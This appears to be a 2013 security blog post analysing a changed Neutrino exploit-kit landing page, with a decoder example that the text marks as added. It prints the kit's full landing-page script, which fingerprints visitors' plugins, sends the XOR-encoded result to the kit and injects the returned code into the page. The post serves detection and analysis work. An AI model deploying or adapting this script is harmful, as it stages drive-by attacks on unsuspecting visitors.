Tuesday, April 23, 2013

Neutrino Exploit Kit landing page change or variation


I picked this up today and it seems the landing page of Neutrino has changed. Gone is the random string generation after the prefixed h, i and p HTTP POST variables. The HTTP URL c(random string) is also hardcoded instead of randomly generated. The HTTP POST request has also changed, as there is no longer an h(random string). The i(random string) variable has grown beyond the previous limit of max 11 chars.

For the previous landing page I have seen (reported by @kafeine and @malwaresigs), look at this post.
For a more thorough analysis, look at "Neutrino Exploit Kit Analysis".

The new landing page


<!DOCTYPE HTML>
<html>
    
    <head>
        <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
        <script type="text/javascript" src="scripts/js/plugin_detector.js"></script>
        <script type="text/javascript">
            $(document).ready(function () {
                // The function name is АН602 (two Cyrillic letters); the definition
                // below spells the same identifier with \u escapes. Arguments:
                // hid, XOR key, POST URL, key parameter name, payload parameter name.
                АН602(
                    '517679ebaba2cc891d009dee',
                    'gbdlnep',
                    'cxiqocvbqd',
                    'pcnfjrcxxpu',
                    'ivexxbpclutvfxs');
            });

            function \u0410\u041d602(a, c, d, b, e) {
                // Fingerprint the visitor's plugins with PluginDetect.
                a = {
                    hid: a,
                    plugins: {
                        adobe_reader: PluginDetect.getVersion("AdobeReader"),
                        java: PluginDetect.getVersion("Java"),
                        flash: PluginDetect.getVersion("Flash"),
                        quick_time: PluginDetect.getVersion("QuickTime"),
                        real_player: PluginDetect.getVersion("RealPlayer"),
                        shockwave: PluginDetect.getVersion("Shockwave"),
                        silver_light: PluginDetect.getVersion("Silverlight"),
                        vlc: PluginDetect.getVersion("VLC"),
                        wmp: PluginDetect.getVersion("WMP")
                    }
                };
                var f = {};
                f[b] = c; // XOR key, sent in the clear under the p(...) parameter
                f[e] = encodeURIComponent(xor(JSON.stringify(a),
                    c)); // fingerprint JSON, XOR'd with the key, under the i(...) parameter
                $.post(d, f, function (a) {
                    // The reply is XOR'd with the same key and injected into the page
                    $("body").append(xor(decodeURIComponent(a), c))
                })
            }
            function xor(a, c) {
                for (var d = "", b = 0, e = 0, b = 0; b < a.length; b++) e = Math.floor(b % c.length), d += String.fromCharCode(a.charCodeAt(b) ^ c.charCodeAt(e));
                return d
            }
            JSON.stringify = JSON.stringify || function (a) {
                var c = typeof a;
                if ("object" != c || null === a) return "string" == c && (a = '"' + a + '"'), String(a);
                var d, b, e = [],
                    f = a && a.constructor == Array;
                for (d in a) b = a[d], c = typeof b, "string" == c ? b = '"' + b + '"' : "object" == c && null !== b && (b = JSON.stringify(b)), e.push((f ? "" : '"' + d + '":') + String(b));
                return (f ? "[" : "{") + String(e) + (f ? "]" : "}")
            };
        </script>
    </head>
    
    <body></body>

</html>


These changes give us a new HTTP POST as well.
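Because the landing page puts the XOR key in the clear (f[b] = c) right beside the XOR'd fingerprint (f[e]), a captured POST can be decoded without anything else. The following is an added example, not code from the original post: it rebuilds the POST body the way jQuery would send it and decodes it back to the plugin JSON. The parameter names and hid are the ones in the captured page; the plugin values are constructed for the demo.

```javascript
// Added example (not from the original post): encode and decode the
// Neutrino landing-page POST. Parameter names are from the captured page;
// the sample plugin versions below are constructed.

const KEY_PARAM = "pcnfjrcxxpu";      // the "b" name: carries the XOR key c
const DATA_PARAM = "ivexxbpclutvfxs"; // the "e" name: carries the payload

// Same repeating-key XOR as the landing page (key index = i % key.length).
function xor(text, key) {
  let out = "";
  for (let i = 0; i < text.length; i++) {
    out += String.fromCharCode(text.charCodeAt(i) ^ key.charCodeAt(i % key.length));
  }
  return out;
}

// Build the body as jQuery's $.post sends it: $.param percent-encodes every
// value, so the already encodeURIComponent'd payload is encoded a second time.
function buildPostBody(hid, key, plugins) {
  const fields = {};
  fields[KEY_PARAM] = key;
  fields[DATA_PARAM] = encodeURIComponent(xor(JSON.stringify({ hid, plugins }), key));
  return Object.keys(fields)
    .map((k) => encodeURIComponent(k) + "=" + encodeURIComponent(fields[k]))
    .join("&");
}

// Parse a captured form body, take the key from keyParam, and undo the
// encoding steps in reverse: form decode, decodeURIComponent, xor.
function decodePostBody(body, keyParam = KEY_PARAM, dataParam = DATA_PARAM) {
  const fields = {};
  for (const pair of body.split("&")) {
    const i = pair.indexOf("=");
    const k = decodeURIComponent(pair.slice(0, i));
    fields[k] = decodeURIComponent(pair.slice(i + 1).replace(/\+/g, "%20"));
  }
  const json = xor(decodeURIComponent(fields[dataParam]), fields[keyParam]);
  return JSON.parse(json);
}

// Constructed sample: a visitor reporting Java 7u10 and no Flash; hid and key
// are the values in the captured page above.
const SAMPLE_PLUGINS = { java: "1,7,0,10", flash: null };
const SAMPLE_BODY = buildPostBody("517679ebaba2cc891d009dee", "gbdlnep", SAMPLE_PLUGINS);
console.log(SAMPLE_BODY);
console.log(decodePostBody(SAMPLE_BODY));
```

For a real capture, pass the key and payload parameter names seen in that landing page to decodePostBody, since they vary per campaign.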





If I'm wrong, please correct me.

Happy detecting Neutrino exploit kits :)
